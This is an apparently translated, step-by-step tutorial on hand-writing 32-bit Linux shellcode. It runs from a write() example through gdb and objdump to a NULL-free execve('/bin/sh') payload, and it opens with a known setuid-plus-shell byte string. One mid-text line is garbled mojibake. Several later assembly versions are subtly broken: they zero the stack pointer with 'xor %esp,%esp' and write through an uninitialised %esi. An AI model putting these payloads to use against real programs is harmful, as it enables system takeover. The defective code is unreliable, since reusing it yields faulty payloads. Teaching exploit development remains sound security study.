* Writing shellcode

When an attacker finds a program with a bug that lets its flow of execution be
redirected, the redirected control has to land on code that was put in memory
beforehand, so that code must be prepared in advance. How is such code made?
That is what this document walks through, step by step.

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80
\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

Anyone who has searched for "shellcode" has probably seen a byte string like
the one above. How is code like this written? Producing it by hand takes some
knowledge of assembly, but it is not as hard as it looks: once you understand
the principle, you can write code that does whatever you want. The approach
taken here is not to understand everything at once. First we write the simplest
possible program, understand exactly what happens when it runs, and then build
on it one step at a time until we arrive at working shellcode.

So what code shall we make? Let's start with the simplest thing: printing
"Hello, Students!" on the screen. To print a string you normally call printf().
But printf() does not print by itself; internally it calls write(). printf() is
a library function that wraps write() so that the programmer can format output
easily, and it is therefore far more complex than write(). Using write()
directly will clearly be simpler.

So, to keep the shellcode simple, we will print the string with write(). First,
here is the C code that prints a string on the screen using write().

========================================
#include <unistd.h>

int main()
{
	write(1, "Hello, Students!\n", 17);
}
========================================

The first argument is the file descriptor to write to: 1 means standard output,
which here is the terminal screen we are looking at. The second argument is the
string to print, and the third is the length of that string.

Compile and run it; the string is printed, of course. This is the code we will
turn into shellcode. A computer, however, does not understand C; it understands
only the 0s and 1s of machine code, and a human cannot read or write long runs
of 0s and 1s directly.

That is where assembly language comes in. C, PHP and Java are languages made
for people; assembly is the closest a human-readable language gets to what the
machine executes. So rather than converting C straight into 0s and 1s, we first
express the program in assembly and then convert that into machine code.

"How do we convert C into assembly?"

Our old friends gcc and gdb do this job for us. First, compile the program
above.

=======================================================
[root@hackerschool assem]# gcc -o write write.c -static
[root@hackerschool assem]#
=======================================================

Note the -static option: it links the code of write() into the binary itself,
so we can inspect it later. Now let's analyse the resulting binary with gdb.
gdb (a program for analysing running programs) can also convert machine code
back into assembly.

===========================================================================
[root@hackerschool assem]# gdb write
GNU gdb Red Hat Linux (5.1.90CVS-5)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb)
===========================================================================

The write binary is now loaded in gdb. Let's look at main() in assembly.
Converting machine code back into assembly in this way is called
disassembling.

================================================
(gdb) disassem main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp
0x80481e1 <main+1>:     mov    %esp,%ebp
0x80481e3 <main+3>:     sub    $0x8,%esp
0x80481e6 <main+6>:     sub    $0x4,%esp
0x80481e9 <main+9>:     push   $0x11
0x80481eb <main+11>:    push   $0x808ce68
0x80481f0 <main+16>:    push   $0x1
0x80481f2 <main+18>:    call   0x804ccf0 <write>
0x80481f7 <main+23>:    add    $0x10,%esp
0x80481fa <main+26>:    leave
0x80481fb <main+27>:    ret
End of assembler dump.
(gdb)
================================================

This is our main() expressed in assembly. The compiled write binary is stored
as machine code the computer understands, and gdb has translated it back into
assembly for us.

Don't try to understand every instruction yet. Just notice that 0x11 is
pushed, then 0x808ce68, then 0x1, and that write is then called.

What are 0x11, 0x808ce68 and 0x1? Convert them to decimal: 0x11 is 17,
0x808ce68 looks like an address so leave it as it is, and 0x1 is simply 1.
Look familiar? They are the arguments of

write(1, "Hello, Students!\n", 17);

which is the write() call from our code. So is 0x808ce68 the address where the
"Hello..." string begins?

Let's check with gdb.

======================================================
(gdb) x/s 0x808ce68
0x808ce68 <_IO_stdin_used+4>:    "Hello, Students!\n"
(gdb)
======================================================

Exactly right. The three arguments of write were pushed in reverse order. A
push places a value on the stack, a memory area in which the last value stored
is the first one taken out. Instead of "1, string, 17" they were pushed as
"17, string, 1". Remember this reversed order: the arguments of a function
(here write) are always pushed onto the stack in reverse. It does not matter
much here, but in a buffer overflow attack the order in which arguments sit on
the stack is very important, so it is worth knowing.

So can we make our shellcode simply push the three write() arguments in reverse
order and then call write()? Where would that call go? Unfortunately it is not
that simple: to write the code ourselves we have to know how write() itself is
implemented.

So this time let's disassemble the body of write() with gdb.

============================================================
(gdb) disass write
Dump of assembler code for function write:
0x804ccf0 <write>:      push   %ebx
0x804ccf1 <write+1>:    mov    0x10(%esp,1),%edx
0x804ccf5 <write+5>:    mov    0xc(%esp,1),%ecx
0x804ccf9 <write+9>:    mov    0x8(%esp,1),%ebx
0x804ccfd <write+13>:   mov    $0x4,%eax
0x804cd02 <write+18>:   int    $0x80
0x804cd04 <write+20>:   pop    %ebx
0x804cd05 <write+21>:   cmp    $0xfffff001,%eax
0x804cd0a <write+26>:   jae    0x804d510 <__syscall_error>
0x804cd10 <write+32>:   ret
0x804cd11 <write+33>:   jmp    0x804cd20 <fcntl>
0x804cd13 <write+35>:   nop
......
0x804cd1f <write+47>:   nop
End of assembler dump.
(gdb)
============================================================

The essential part is this.

0x804ccf1 <write+1>:    mov    0x10(%esp,1),%edx
0x804ccf5 <write+5>:    mov    0xc(%esp,1),%ecx
0x804ccf9 <write+9>:    mov    0x8(%esp,1),%ebx
0x804ccfd <write+13>:   mov    $0x4,%eax
0x804cd02 <write+18>:   int    $0x80

The int instruction at the end of this code is an interrupt: it asks the system
for a particular service. Interrupt 0x80 is the Linux system call interrupt,
which asks the kernel to run one of the functions built into it. Which
function? The number 0x4 loaded just before the int decides: the value 4 means
the fourth entry in the system call table. The table of system call numbers
can be found in /usr/include/asm/unistd.h or
/usr/src/linux/include/asm-i386/unistd.h.

============ unistd.h =============

#define __NR_exit                 1
#define __NR_fork                 2
#define __NR_read                 3
#define __NR_write                4
#define __NR_open                 5
#define __NR_close                6
#define __NR_waitpid              7
#define __NR_creat                8
...  ...

===================================

Reading off the entries from the top, we find that number 4 means write().

The mov instruction, written mov A, B in this (AT&T) syntax, stores A into B.
So mov $0x4, %eax stores the value 4 in the eax register (a small storage
location inside the CPU).

When int 0x80 executes, the values held in the eax, ebx, ecx and edx registers
are read and used: eax holds the system call number, and ebx, ecx and edx hold
the first, second and third arguments of that system call.

Knowing this, we can tell that ebx is 1, ecx is the address of "Hello...", and
edx is the string length 17, even without knowing where those values came from.
To follow the write() code exactly you would also need to understand the Stack
Pointer (esp) and Base Pointer (ebp); that is left to the "buffer overflow"
document.

Let's summarise what we have found so far.

* The steps by which Hello, Students! gets printed

(1) write()'s third argument, 17, is pushed onto the STACK.
(2) The second argument, the address of the "Hello..." string, is pushed onto the STACK.
(3) The first argument, 1, is pushed onto the STACK.
(4) write() is called.
(5) The third argument, 17, is stored in edx.
(6) The second argument, the address of "Hello...", is stored in ecx.
(7) The first argument, 1, is stored in ebx.
(8) 4, the system call number of write(), is stored in eax.
(9) The int 0x80 interrupt that invokes a system call is raised.
(10) The kernel reads eax, ebx, ecx and edx and performs the write() system call.

Now that we know this, we can write assembly code of our own that does exactly
the same thing.

=================================
.LCO:
	.string "Hello, Students!\n"
.globl main
main:
	movl $0x04, %eax
	movl $0x01, %ebx
	movl $.LCO, %ecx
	movl $0x11, %edx
	int $0x80
	ret
=================================

See? It reproduces the core of write(): invoking the write system call. Here
lies the difference between a function and a system call. A function is
something we write ourselves or take from a library, while a system call is a
function provided by the kernel so that user programs can request its
services.

Compile and run it. Since this is assembly source, the file must be named *.s,
not *.c.

[root@hackerschool assem]# gcc -o write write.s
[root@hackerschool assem]# ./write
Hello, Students!
Segmentation fault
[root@hackerschool assem]#

The string is printed, but right after it we get a Segmentation fault. Why?
The ret instruction takes the return address from the top of the stack and
jumps to it. We never put a valid return address on the stack, so ret jumped
to whatever happened to be there, and that is what causes the fault. We can
avoid this by ending the program with exit() instead of returning from main().

So let's add code that calls exit(0). First check the number under which the
exit() system call is registered in the table.

[root@hackerschool assem]# cat /usr/include/asm/unistd.h | grep exit
#define __NR_exit                 1
...  ...
[root@hackerschool assem]#

It is registered as number 1. So the code is as follows.

movl $0x01, %eax
movl $0x00, %ebx
int $0x80

Very simple. Add this exit(0) code after the earlier code. Since exit(0)
terminates the program, the ret instruction that was there before is no longer
needed and can be removed.

=================================
.LCO:
	.string "Hello, Students!\n"
.globl main
main:
	movl $0x04, %eax
	movl $0x01, %ebx
	movl $.LCO, %ecx
	movl $0x11, %edx
	int $0x80
	movl $0x01, %eax
	movl $0x00, %ebx
	int $0x80
=================================

Compile and run it again.

[root@hackerschool assem]# gcc -o write write.s
[root@hackerschool assem]# ./write
Hello, Students!
[root@hackerschool assem]#

Now the string is printed and the program ends cleanly. Next, this assembly
has to become machine code. In fact the compiler already did that when we ran
gcc above; what we need is a way to see the machine code inside the compiled
write binary, and for that we use /usr/bin/objdump.

==============================================================
[root@hackerschool assem]# objdump -d write
...  ...
080483e2 <main>:
 80483e2:       b8 04 00 00 00          mov    $0x4,%eax
 80483e7:       bb 01 00 00 00          mov    $0x1,%ebx
 80483ec:       b9 d0 83 04 08          mov    $0x80483d0,%ecx
 80483f1:       ba 11 00 00 00          mov    $0x11,%edx
 80483f6:       cd 80                   int    $0x80
 80483f8:       b8 01 00 00 00          mov    $0x1,%eax
 80483fd:       bb 00 00 00 00          mov    $0x0,%ebx
 8048402:       cd 80                   int    $0x80
...  ...
==============================================================

Our assembly code appears on the right, with its machine code on the left.
Each instruction has been converted into its own sequence of bytes: 2-byte
instructions, 5-byte instructions, and so on, shown in hex, with each pair of
hex digits being one byte. Looking closely, there is one oddity: the second
argument, the address of the string, is a fixed address that appears nowhere
in what we wrote.

mov    $0x80483d0,%ecx

That is the address at which the string was placed in this particular binary.
If the same code is placed anywhere else, 0x80483d0 is not where the string
will be, and the chance that "Hello..." sits at exactly that address in some
other environment is ZERO. A fixed address like this is useless in shellcode.
What if the "Hello..." string were included in the code itself, and its
address found at run time and loaded into %ecx?

It can be done like this: arrange for the string's address to land on the
stack, then pop it from the stack into %ecx. Here is the trick, in assembly.

=================================
.globl main
main:
        call func
        .string "Hello, Students!\n"
func:
        movl $0x04, %eax
        movl $0x01, %ebx
        popl %ecx
        movl $0x11, %edx
        int $0x80
        movl $0x01, %eax
        movl $0x00, %ebx
        int $0x80
=================================

When call transfers control to a function, it first pushes the address of the
instruction following the call (the return address) onto the stack. Here the
"instruction" following call func is the "Hello..." string itself, so its
address is what gets pushed. Inside func, %eax is set to 4 (the write system
call) and %ebx to 1 (standard output), and then popl %ecx takes the value on
top of the stack into %ecx. What is on top of the stack is the return address
pushed by call, which is the address of the "Hello..." string. So %ecx ends up
holding the string address without any fixed value in the code.

Compile this code and check the result with objdump.

==============================================================
[root@hackerschool assem]# objdump -d write
...  ...
080483d0 <main>:
 80483d0:       e8 12 00 00 00          call   80483e7 <func>
 80483d5:       48                      dec    %eax
 80483d6:       65                      gs
 80483d7:       6c                      insb   (%dx),%es:(%edi)
 80483d8:       6c                      insb   (%dx),%es:(%edi)
 80483d9:       6f                      outsl  %ds:(%esi),(%dx)
 80483da:       2c 20                   sub    $0x20,%al
 80483dc:       53                      push   %ebx
 80483dd:       74 75                   je     8048454 <gcc2_compiled.+0x4>
 80483df:       64 65 6e                outsb  %fs:%gs:(%esi),(%dx)
 80483e2:       74 73                   je     8048457 <gcc2_compiled.+0x7>
 80483e4:       21 0a                   and    %ecx,(%edx)
        ...

080483e7 <func>:
 80483e7:       59                      pop    %ecx
 80483e8:       b8 04 00 00 00          mov    $0x4,%eax
 80483ed:       bb 01 00 00 00          mov    $0x1,%ebx
 80483f2:       ba 11 00 00 00          mov    $0x11,%edx
 80483f7:       cd 80                   int    $0x80
 80483f9:       b8 01 00 00 00          mov    $0x1,%eax
 80483fe:       bb 00 00 00 00          mov    $0x0,%ebx
 8048403:       cd 80                   int    $0x80
 8048405:       8d 76 00                lea    0x0(%esi),%esi
...  ...
==============================================================

Something looks odd. The "Hello..." string appears nowhere in the output.
Where is it? Right after the call instruction come the bytes 48 65 6c ..., and
those bytes are "Hello..." in ASCII. objdump has tried to interpret our string
as instructions, which is why meaningless instructions such as dec, gs and
insb appear where the string should be.

,    ޿  ٷ ձ⸸ ϸ  츮 ϴ 
 .  ,  16    ռ ̾ .

e8 12 00 00 00 48 65 6c 6c 6f 2c 20 53 74 75 64 65 6e 74 73 21 0a 
              (H  e  l  l  o  ,     S  t  u  d  e  n  t  s  !  \n)
59 b8 04 00 00 00 bb 01 00 00 00 ba 11 00 00 00 cd 80 b8 01 00 00 00
bb 00 00 00 00 cd 80 8d 76 00

This byte sequence is the machine code for write(1, "Hello, Students!\n", 17);.
Let's test whether it works when placed inside another program, using C. To
embed it in a C string, each byte is written in hex with a \x prefix.

\xe8\x12\x00\x00\x00\x48 65 6c 6c 6f 2c 20 53 74 75 64 65 6e 74 73 21 0a 

The string part does not need to be written in hex. The \x escape only matters
for bytes that are not printable; the compiler encodes ASCII characters as
exactly the same bytes, so that part can be written as plain text.

\xe8\x12\x00\x00\x00Hello, Students!\n

One more detail: in the objdump output the string ends at \n, but .string also
appends a terminating \00, and objdump hid it inside the "..." line. Insert
the \x00 and append the remaining bytes.

\xe8\x12\x00\x00\x00Hello, Students!\n\x00
\x59\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xba\x11\x00\x00\x00\xcd\x80\xb8
\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\x8d\x76\x00

The shellcode is complete. Let's test whether it runs inside a C program.

===========================================================================
int main()
{
	char *code = "\xe8\x12\x00\x00\x00Hello, Students!\n\x00"
                 "\x59\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xba\x11\x00"
                 "\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00"
                 "\xcd\x80\x8d\x76\x00";

	void (*pointer)(void); // declare a function pointer to hold a code address

	pointer = (void (*)(void))code; // point it at the start of our bytes so
                                    // they are treated as a function body

	pointer(); // call through the pointer; the machine code runs
}
===========================================================================

Compile and run it.

===================================
[root@hackerschool assem]# ./write
Hello, Students!
[root@hackerschool assem]#
===================================

The shellcode works perfectly. There is, however, one inconvenience left. What
if we want to print a different string instead of Hello, Students!? Is
replacing the string enough? Look at the bytes just before the string.

\xe8 \x12 \x00 \x00 \x00

Here \xe8 is the call opcode, and \x12 is 18 in decimal, meaning "call the code
18 bytes ahead". Count 18 bytes past these five and you reach exactly the
"\x59\xb8..." that follows the string. In other words, if the string changes
length, the place call jumps to changes as well: to swap in another string we
would also have to adjust the \x12 in \xe8 \x12 to match the new length. If we
remove this dependency, the string can be replaced much more freely, and
beyond replacing the string, the same idea lets us replace the code itself,
for example with code that runs /bin/sh.

Let's restructure the assembly we wrote earlier as follows.

====================================
.globl main
main:
		jmp come_here
func:
		movl $0x04, %eax
		movl $0x01, %ebx
		popl %ecx
		movl $0x11, %edx
		int $0x80
		movl $0x01, %eax
		movl $0x00, %ebx
		int $0x80
come_here:
		call func
		.string "Hello, Students!\n"
====================================

Now the code comes first and the string is placed after it. Compile it and
extract the machine code with objdump; the result is this.

eb 1e b8 04 00 00 00 bb 01 00 00 00 59 ba 11 00 00 00 cd 80
b8 01 00 00 00 bb 00 00 00 00 cd 80 e8 dd ff ff ff
                                    ~~~~~~~~~~~~~~
                                    the call instruction
48 65 6c 6c 6f 2c 20 53 74 75 64 65 6e 74 73 21 0a 00
H  e  l  l  o  ,     S  t  u  d  e  n  t  s  ! \n \00

This time the call operand is dd ff ff ff, which read as a little-endian value
is 0xffffffdd. What does 0xffffffdd mean? Converted to a signed int it is -35:
a negative displacement, i.e. backwards. So this call moves 35 bytes back, to
the eb 1e b8 ... where the code starts. Now, however long the "Hello..."
string becomes, the position the call jumps to never changes, and the string
can be swapped for any other. (The 0x11 passed to write() as the length still
has to match the new string, and for shellcode that runs "/bin/sh" a NULL has
to be added after the string, which means changing a few instructions, so some
fiddling remains.) The point here is to understand the principle by which
shellcode is built.

Now let's apply all of this to the real thing: shellcode that runs a shell.
Since every step has already been covered, a summary of the procedure is
enough: write the program in C, analyse it with gdb to find the parts we need,
rewrite those in assembly, extract the machine code with objdump, and join the
bytes into shellcode.

- Steps for making shellcode

1. Write the code in C.
2. Analyse it with gdb and find the parts that are needed.
3. Rewrite those parts in assembly.
4. Compile, then extract the machine code with objdump.
5. Join the extracted bytes into one sequence.

First we need C code that runs a shell. Which function should it use?
system("/bin/sh")? Or execl("/bin/sh", "sh", 0)? Both would work, but neither
is the right choice, for the same reason printf() was not: just as printf()
ends up calling write(), these functions end up calling execve(). And execve()
compiles to far fewer and simpler instructions than system() or execl(), which
do a great deal of other work first. To see which system calls a function
really makes, use /usr/bin/strace (system call trace): it shows, in real time,
every system call a program issues.

==========================
#include <stdlib.h>

int main()
{
	system("/bin/sh");
}
==========================

Compile this as test and run strace test; in the output you will see a line
such as execve("/usr/bin/test", ["test"], [/* 22 vars */]) showing execve
being used. Every program, whatever language it is written in, ends up
requesting the kernel's system calls. Even a simple command like ls issues
open(), close(), read(), write() and other system calls internally, as strace
will show you.

So let's skip the intermediaries and write the C code with execve() directly.

=================================
#include <unistd.h>

int main()
{
	char *str[2];
	str[0] = "/bin/sh";
	str[1] = 0;
	execve(str[0], str, 0);
}
=================================

Compile it and analyse it with gdb.

=============================================================================
[root@hackerschool assem]# gcc -o execve execve.c -static
[root@hackerschool assem]# gdb execve
GNU gdb Red Hat Linux (5.1.90CVS-5)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb)
=============================================================================

Disassemble main.

=========================================================
(gdb) disass main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp
0x80481e1 <main+1>:     mov    %esp,%ebp
0x80481e3 <main+3>:     sub    $0x8,%esp
0x80481e6 <main+6>:     movl   $0x808cec8,0xfffffff8(%ebp)
0x80481ed <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x80481f4 <main+20>:    sub    $0x4,%esp
0x80481f7 <main+23>:    push   $0x0
0x80481f9 <main+25>:    lea    0xfffffff8(%ebp),%eax
0x80481fc <main+28>:    push   %eax
0x80481fd <main+29>:    pushl  0xfffffff8(%ebp)
0x8048200 <main+32>:    call   0x804cb40 <execve>
0x8048205 <main+37>:    add    $0x10,%esp
0x8048208 <main+40>:    leave
0x8048209 <main+41>:    ret
0x804820a <main+42>:    mov    %esi,%esi
End of assembler dump.
(gdb)
=========================================================

When main() is called, the old base pointer is saved on the stack and a new
base pointer is set (this is explained in detail in the "buffer overflow"
document). Then local variable space is allocated with sub: 8 bytes here,
because a pointer is 4 bytes and char *str[2] declares two of them. str[0] is
set to the memory address of the "/bin/sh" string and str[1] to 0, meaning
NULL. Annotated, it reads as follows.

=========================================================
(gdb) disass main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp
                        // save the old base pointer
0x80481e1 <main+1>:     mov    %esp,%ebp
                        // set the new base pointer
0x80481e3 <main+3>:     sub    $0x8,%esp
                        // allocate 8 bytes of local variable space
0x80481e6 <main+6>:     movl   $0x808cec8,0xfffffff8(%ebp)
                        // str[0] = address of the "/bin/sh" string
0x80481ed <main+13>:    movl   $0x0,0xfffffffc(%ebp)
                        // str[1] = NULL
=========================================================

Then 4 more bytes are allocated, but they are DUMMY space with no meaning. The
three pushes that follow take 12 bytes, and gcc keeps the stack 16-byte
aligned by adding 4 bytes of padding. The first push is the 0 passed as
execve()'s third argument. The second push is the address of str[0], that is,
the address at which the str[2] array itself begins. The third push is the
value stored in str[0], the address of "/bin/sh". Then execve() is called,
and with that main() is fully analysed.

=========================================================
0x80481f4 <main+20>:    sub    $0x4,%esp
                        // allocate DUMMY space
0x80481f7 <main+23>:    push   $0x0
                        // third argument: 0
0x80481f9 <main+25>:    lea    0xfffffff8(%ebp),%eax
                        // address of str[0] into %eax
0x80481fc <main+28>:    push   %eax
                        // second argument: address of str[0] (the array)
0x80481fd <main+29>:    pushl  0xfffffff8(%ebp)
                        // first argument: value of str[0], the "/bin/sh" address
0x8048200 <main+32>:    call   0x804cb40 <execve>
                        // call execve()
=========================================================

Now let's disassemble the execve() function that main() calls. It produces
quite a few instructions; only the important ones are shown here.

====================================================
0x804cb46 <execve+6>:   mov    %esp,%ebp
0x804cb4c <execve+12>:  mov    0x8(%ebp),%edi 
0x804cb56 <execve+22>:  mov    0xc(%ebp),%ecx
0x804cb59 <execve+25>:  mov    0x10(%ebp),%edx
0x804cb5d <execve+29>:  mov    %edi,%ebx 
0x804cb5f <execve+31>:  mov    $0xb,%eax 
0x804cb64 <execve+36>:  int    $0x80
====================================================

First, to make the stack addresses easier to follow, here is the stack at the
moment execve() runs.

low addresses                                                    high addresses
===========================================================================
  SFP | execve RET | "/bin/sh" address | address of str[0] | 0 | SFP | main RET
===========================================================================
<----- the stack grows this way

Once execve has set up its own base pointer, the first argument is loaded into
%edi, and three lines further down it is moved into %ebx. The second argument,
the address of str, goes into %ecx, and the third argument, 0, into %edx. In
summary:

%eax = 11 : execve system call number
%ebx = str[0] : the address of "/bin/sh"
%ecx = str : the address at which the array begins
%edx = 0 : NULL

====================================================
0x804cb46 <execve+6>:   mov    %esp,%ebp
0x804cb4c <execve+12>:  mov    0x8(%ebp),%edi
                               // first argument: str[0], the "/bin/sh" address
0x804cb56 <execve+22>:  mov    0xc(%ebp),%ecx
                               // second argument: address of str[0]
0x804cb59 <execve+25>:  mov    0x10(%ebp),%edx
                               // third argument: 0
0x804cb5d <execve+29>:  mov    %edi,%ebx
                               // the "/bin/sh" address is moved on into %ebx
0x804cb5f <execve+31>:  mov    $0xb,%eax
                               // execve system call number 11
0x804cb64 <execve+36>:  int    $0x80
====================================================

With that understood, let's write an assembly program that runs a shell.

* What we have to do

(1) Put 11 in %eax.
(2) Put the address of "/bin/sh" in %ebx.
(3) Put in %ecx the address of an array ["/bin/sh" address][0].
(4) Put 0 in %edx.
(5) Raise the system call interrupt.

The tricky part is (3). Watch how (3) is handled in the complete code below.

==============================================================
.globl main
main:
		jmp     come_here
		// jump down to come_here

func:
		movl    $0x0b, %eax
		// execve system call number 11 into %eax

		popl    %ebx
		// pop the "/bin/sh" address into %ebx (first argument)

		movl    %ebx, (%esi)
		movl    $0x00, 0x4(%esi)
		// build the array: ["/bin/sh" address][0]

		leal    (%esi), %ecx
		// start address of the array into %ecx (second argument)

		movl    $0x00, %edx
		// NULL (third argument)

		int     $0x80
		// raise the system call interrupt

		// from here on: exit(0)
		movl    $0x01, %eax
		movl    $0x00, %ebx
		int     $0x80

come_here:
		calll func
		.string "/bin/sh\00"
==============================================================

One thing to keep in mind when reading this code: a bare register name means
the value in the register, whereas a register in parentheses means the memory
at the address the register holds. So movl $0x0, %eax stores 0 in %eax itself,
while movl $0x0, (%eax) stores 0 at the address %eax points to.

Compile it and check that it runs correctly.

==================================================
[root@hackerschool assem]# gcc -o shell shell.s
[root@hackerschool assem]# ./shell
sh-2.05a#
==================================================

It works. Now extract the machine code.

============================================================================
[root@hackerschool assem]# objdump -d shell
...  ...
080483d0 <main>:
 80483d0:       eb 24                   jmp    80483f6 <come_here>

080483d2 <func>:
 80483d2:       b8 0b 00 00 00          mov    $0xb,%eax
 80483d7:       5b                      pop    %ebx
 80483d8:       89 1e                   mov    %ebx,(%esi)
 80483da:       c7 46 04 00 00 00 00    movl   $0x0,0x4(%esi)
 80483e1:       8d 0e                   lea    (%esi),%ecx
 80483e3:       ba 00 00 00 00          mov    $0x0,%edx
 80483e8:       cd 80                   int    $0x80
 80483ea:       b8 01 00 00 00          mov    $0x1,%eax
 80483ef:       bb 00 00 00 00          mov    $0x0,%ebx
 80483f4:       cd 80                   int    $0x80

080483f6 <come_here>:
 80483f6:       e8 d7 ff ff ff          call   80483d2 <func>
 80483fb:       2f                      das
 80483fc:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80483ff:       2f                      das
 8048400:       73 68                   jae    804846a <gcc2_compiled.+0x1a>
 8048402:       00 00                   add    %al,(%eax)
...  ...
============================================================================

This code has a problem, and it has nothing to do with whether it runs. In the
middle of the machine code there are bytes with the value \x00. If this
shellcode is handed to a string function such as strcpy(), the copy stops at
the first \x00, because string functions treat \x00 (NULL) as the end of the
string, and the shellcode is cut short.

So how do we get rid of the \x00 bytes? Here is a trick used for this. Among
the assembly instructions there is xor, the exclusive-or operation: for two
inputs A and B, a result bit is 1 only where the bits of A and B differ. Some
examples.

A      : 1010      A      : 0010      A      : 1110      A      : 0010
B      : 1011      B      : 1001      B      : 0000      B      : 0010
result : 0001      result : 1011      result : 1110      result : 0000

Which of these four cases is the one we need? The last one. A is 0010 and B is
0010, and the result is 0000: every bit is the same, so every result bit is 0.
XORing any value with itself yields 0, and that is the property of XOR we will
use.

Now we know how to produce a 0 without writing a 0 byte. Look at
"mov $0xb,%eax". Storing 0xb in the 4-byte register %eax really stores
0x0000000b, and those three leading zero bytes are where the \00 bytes come
from. So first use XOR to set %eax to 0.

"xor %eax, %eax"

After this instruction %eax is 0: as shown above, XORing two equal values
gives 0.

Next we need to put the single byte \x0b into the lowest byte of %eax, and an
instruction suffix does exactly that.

So far we have written mov with an l suffix, movl. That l stands for longword,
4 bytes; besides l there are w and b: movw moves 2 bytes and movb moves 1
byte. So with movb we can put \x0b into the low byte of %eax (%al) alone.

"xor %eax, %eax"   <- set %eax to 0
"movb $0x0b, %al"  <- put the byte \x0b into the low byte of %eax

Apply the same treatment to every other instruction that produces a \x00 byte.

* Before
==============================================================
.globl main
main:
		jmp     come_here
func:
		movl    $0x0b, %eax
		popl    %ebx
		movl    %ebx, (%esi)
		movl    $0x00, 0x4(%esi)
		leal    (%esi), %ecx
		movl    $0x00, %edx
		int     $0x80
		movl    $0x01, %eax
		movl    $0x00, %ebx
		int     $0x80

come_here:
		calll func
		.string "/bin/sh\00"
==============================================================

* After
==============================================================
.globl main
main:
                jmp     come_here
func:
                xor     %eax, %eax
                movb    $0x0b, %al
                popl    %ebx
                movl    %ebx, (%esi)
                xor     0x4(%esi), 0x4(%esi)
                leal    (%esi), %ecx
                xor     %edx, %edx
                int     $0x80
                xor     %eax, %eax
                movb    $0x01, %al
                xor     %ebx, %ebx
                int     $0x80

come_here:
                calll func
                .string "/bin/sh\00"
==============================================================

There is one thing here that is not allowed: xor 0x4(%esi), 0x4(%esi). An
instruction cannot take two memory operands. How do we get around it? Simple:
take a register that holds 0 and store it to memory. The
xor 0x4(%esi), 0x4(%esi) line is replaced by an xor that zeroes a register and
a movl that writes it.

xor     0x4(%esi), 0x4(%esi)
--->
xor     %esp, %esp
movl    %esp, 0x4(%esi)

The completed code is as follows.

==============================================================
.globl main
main:
                jmp     come_here
func:
                xor     %eax, %eax
                movb    $0x0b, %al
                popl    %ebx
                movl    %ebx, (%esi)
                xor     %esp, %esp
                movl    %esp, 0x4(%esi)
                leal    (%esi), %ecx
                xor     %edx, %edx
                int     $0x80
                xor     %eax, %eax
                movb    $0x01, %al
                xor     %ebx, %ebx
                int     $0x80

come_here:
                calll func
                .string "/bin/sh\00"
==============================================================

Is it 100% complete now? Not yet. There is one more \x00, the one right after
/bin/sh. It is solved the same way as 0x4(%esi): remove the \00 from .string
and add the following code.

popl    %ebx
--->
popl    %ebx
xor     %esp, %esp
movl    %esp, 0x7(%ebx)

"/bin/sh" is 7 bytes long, so a 0 is written 7 bytes past its start.

With this, shellcode containing no NULL is complete. Compile it and check the
machine code with objdump.

=========================================================================
...  ...
080483d0 <main>:
 80483d0:       eb 1f                   jmp    80483f1 <come_here>

080483d2 <func>:
 80483d2:       31 c0                   xor    %eax,%eax
 80483d4:       b0 0b                   mov    $0xb,%al
 80483d6:       5b                      pop    %ebx
 80483d7:       31 e4                   xor    %esp,%esp
 80483d9:       89 63 07                mov    %esp,0x7(%ebx)
 80483dc:       89 1e                   mov    %ebx,(%esi)
 80483de:       31 e4                   xor    %esp,%esp
 80483e0:       89 66 04                mov    %esp,0x4(%esi)
 80483e3:       8d 0e                   lea    (%esi),%ecx
 80483e5:       31 d2                   xor    %edx,%edx
 80483e7:       cd 80                   int    $0x80
 80483e9:       31 c0                   xor    %eax,%eax
 80483eb:       b0 01                   mov    $0x1,%al
 80483ed:       31 db                   xor    %ebx,%ebx
 80483ef:       cd 80                   int    $0x80

080483f1 <come_here>:
 80483f1:       e8 dc ff ff ff          call   80483d2 <func>
 80483f6:       2f                      das
 80483f7:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80483fa:       2f                      das
 80483fb:       73 68                   jae    8048465 <_IO_stdin_used+0x1>
===========================================================================

Not a single NULL (0x00) byte is left. The shellcode is complete, but looked
at with what we now know it is not very efficient: there are redundant parts.
Let's trim the code. Shellcode is frequently squeezed into a limited buffer of
the target program, so the shorter it is, the more situations it can be used
in. Exploit sites such as hack.co.za collect very short shellcode, and writing
a new exploit to work with one of them can be a challenge in itself. At
present the shortest standard shellcode is 22 bytes.

Ours is 45 bytes. Here is the result of tightening it up a little.

=============================================================================
080483d0 <main>:
 80483d0:       eb 15                   jmp    80483e7 <come_here>
080483d2 <func>:
 80483d2:       31 c0                   xor    %eax,%eax
 80483d4:       5b                      pop    %ebx
 80483d5:       89 43 07                mov    %eax,0x7(%ebx)
 80483d8:       89 1e                   mov    %ebx,(%esi)
 80483da:       89 46 04                mov    %eax,0x4(%esi)
 80483dd:       b0 0b                   mov    $0xb,%al
 80483df:       31 e4                   xor    %esp,%esp
 80483e1:       8d 0e                   lea    (%esi),%ecx
 80483e3:       31 d2                   xor    %edx,%edx
 80483e5:       cd 80                   int    $0x80

080483e7 <come_here>:
 80483e7:       e8 e6 ff ff ff          call   80483d2 <func>
